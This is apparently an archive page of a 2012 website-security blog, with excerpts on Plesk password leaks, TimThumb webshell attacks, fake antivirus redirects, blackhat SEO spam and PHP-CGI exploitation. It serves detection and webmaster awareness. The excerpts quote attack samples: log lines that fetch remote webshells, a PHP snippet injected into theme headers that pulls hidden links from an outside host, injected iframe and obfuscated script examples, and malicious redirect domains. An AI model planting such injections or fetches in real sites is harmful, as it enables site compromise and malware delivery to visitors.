Plesk Vulnerability Leading to Malware

June 26, 2012 by 5 Comments

Our friends over at Unmask Parasites posted two very good reports about a mix of Plesk vulnerabilities being used to mass-compromise websites, and redirecting them to the Blackhole Exploit Kit.

The first issue is that old versions of Plesk store passwords in clear text (yes, clear text in 2012). The second is a remote SQL vulnerability that has been found in old versions of Plesk allowing attackers to exploit those passwords.

clear text password + database dump = Mass password leaks

This has possibly allowed attackers to gain access to a large number of passwords and hosts/sites. We recommend reading those two posts to understand the issue:

Read More

Filed Under: Malware, malware_updates, plesk, vulnerability Tagged With: , , ,

Sucuri Labs Weekly Review – June 22nd – 2012

June 23, 2012 by Leave a Comment

Have you checked out Sucuri Labs? We have been adding a daily feed of the top web-based malware
samples that we find every day, and the number of compromised sites as well.

We separate the data into three main categories:

  • Hidden iframes
  • Conditional redirections (genereally done via .htaccess)
  • Encoded javascript.

This helps us understand how sites are getting compromised and how it is being executed in the browser.

Read More

Filed Under: lab, Malware, malware_updates, sucuri Tagged With: , , ,

Google Safe Browsing Program 5 Years Old – Been Blacklisted Lately?

June 19, 2012 by 5 Comments

Today Google released a nice post: Safe Browsing – Protecting Web Users for 5 Years and Counting. In it they provide a good summary of what they have been up to the past 5 years with their Safe Browsing program.

Here are some interesting data points:

  • 600 million users are protected
  • 9,500 new malicious websites are found every day
  • 12 – 14 million Google Search queries show malicious warnings
  • Provide warnings to about 300,000 downloads per day
  • Send thousands of notifications daily to webmasters
  • Sent thousands of notifications daily to Internet Service Providers (ISPs)


Read More

Filed Under: awareness, blacklisted, community, data, education, Malware, malware_updates, phishing, research, security, stats, sucuri Tagged With: , , , , , , , ,

Sucuri SiteCheck – Web Malware Distribution – May 2012

June 8, 2012 by 1 Comment

Last month ( May 2012), we were able to identify 94,866 compromised (hacked) websites using our free SiteCheck scanner.

These were the top infections per distribution type (iframes and conditional redirections). A comparison to April can be seen here – Sucuri SiteCheck – Web Malware Distribution – April 2012):

You can more closely follow the daily activity in our labs by following Sucuri Labs and monitoring the Sucuri Labs page.

Conditional (often htaccess) redirections:

Read More

Filed Under: htaccess, Malware, malware_updates, stats Tagged With: , , ,

List of Domains Hosting Webshells for Timthumb Attacks

May 31, 2012 by 3 Comments

We have been tracking TimThumb related attacks for a while and they are still at full force (yes, some people are still using the outdated versions and getting compromised).

Just for the month of May, we identified more than 400 domains hosting backdoors for those type of attacks and a botnet with more than 1,000 IP addresses scanning sites that might be vulnerable to it.

If you like to look at your logs, that’s how it would look like:

216.227.214.242 – - [31/May/2012:03:55:35 +0000] “GET /wp-content/themes/vibrantcms/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1″ 404 9347 “-” “”

or

112.78.3.167 – - [31/May/2012:03:45:50 +0000] “GET //wp-content/themes/Quadro/timthumb.php?src=http://img.youtube.com.spectra-entertainment.com/upload.php HTTP/1.1″ 404 305 “-” “”

Basically searching for hundreds of themes per site that could have the old timthumb.php enabled and attempting to insert the backdoors from http://img.youtube.com.spectra-entertainment.com/upload.php and http://blogger.com.nilgirisrealty.com/cok.php on it.

The full list of domains hosting the backdoor is on our labs post:

List of domains hosting webshells for Timthumb attacks

and the list of IP addresses there too:

List of IP addresses scanning for vulnerable timthumb .

Filed Under: Malware, malware_updates, vulnerability, WordPress Tagged With: , , ,

Websites Compromised with Fake AV Campaign (Windows Web Secure Kit)

May 15, 2012 by 2 Comments

“To help protect your computer, Windows Web Secure Kit have detected trojans and is ready to remove them”. We are seeing many WordPress sites compromised with a malware redirecting users to the “Windows Web Secure Kit” fake/rogue anti virus. So if you get that message when visiting your (or any site), you know that it is likely compromised by it.

What is going on?

Once a site gets compromised, the .htaccess file gets modified to redirect users running Windows and coming from search engines to some russian sites:

http://colceadem.ru/infinity?8 OR
http://ademcolce.ru/infinity?8 OR
http://tradeincas.ru/siga?7 OR many others

Which then redirects the user to some intermediate sites (also .ru):


Read More

Filed Under: fakeav, htaccess, Malware, malware_updates, WordPress Tagged With: , , , ,

Wpstats. org Spam and a Fake Advanced Search Plugin

May 9, 2012 by 10 Comments

If you are seeing hidden links in your WordPress site, it could be coming from wpstats.org. On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site:

if(function_exists(‘curl_init’)) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data”; }

If you are not familiar with PHP, this code will contact www.wpstats.org/jquery-1.6.3.min.js, which will return a long list of hidden links to be included on your site (not visible on a normal browser).

Read More

Filed Under: hacked, Malware, malware_updates, pharma, Spam Tagged With: , , , ,

PHP-CGI Vulnerability Exploited in the Wild

May 8, 2012 by 16 Comments

When the PHP-CGI vulnerability was disclosed, we knew it would be just a matter of days before it started to be exploited in the wild.

Well, it didn’t take long. Since the weekend, we started to see scanners looking for that vulnerability on our servers and honeypots. And now we are seeing sites getting compromised through it as well.

Understanding the Attack

So far we noticed that the attack starts in two ways, either by checking if the server is vulnerable using the ?-s option (which shows the source of the page):

Read More

Filed Under: Malware, malware_updates, vulnerability Tagged With: , , , ,

Sucuri SiteCheck – Web Malware Distribution – April 2012

May 1, 2012 by 7 Comments

When we see a compromised site distributing malware, it is often done via 4 methods: Iframe, Javascript, Spam or internal redirections. Those are not the only ways, and they can be encoded or hidden differently internally on the sites, but the final output on the compromised sites is generally one of them:

  1. Iframe injection: It makes the browser loads content from external (and malicious web sites). Example: <iframe src="http://pokosa.com/tds/go.php?sid=1" ..
  2. Javascript injection: Used to encode (hide) calls to iframes or additional remote javascript includes. Example: <script>d= Date ;d=new d();h=-parseInt("012")/5;if(window.document)try{new document.getElementById(“qwe”)…. (this code redirects users to the blackhole exploit kit)
  3. .htaccess (or conditional) redirections: Used to redirect anyone visiting the site from search engines (or specific user agents/ referers) to malware or spam content.
  4. Blackhat SEO spam: It is not really malware in the sense of the word (since it won’t infect anyone visiting the site), but it is still harmful for the webmaster and the site’s reputation (imagine a corporate site redirecting to a viagra  online  store).

April / 2012 stats


Read More

Filed Under: data, Malware, malware_updates, sucuri Tagged With: , , ,

Malware campaign against WordPress sites (recovery-hdd dot eu)

April 25, 2012 by 4 Comments

We have been tracking a new malware campaign that has been compromising thousands of WordPress sites over the last 3 days. They are not doing anything new, but using old vulnerabilities in plugins and themes, specially TimThumb, to add iframes to as many sites they can. Unfortunately, they have been very successful so far.

They are using many domains, but the most common one is recovery-hdd.eu, followed by almazzao-co.eu, hence the name of the campaign.

Another tactic they are using is hijacked domain names from legitimate sites and free domain registration services to host their malware (at domain.com/images.php?t=44443094 for the iframe url).

Here are some of the iframes we are seeing they using lately:


Read More

Filed Under: hacked, Malware, malware_updates, security, WordPress Tagged With: , , ,
«Older Posts
Newer Posts»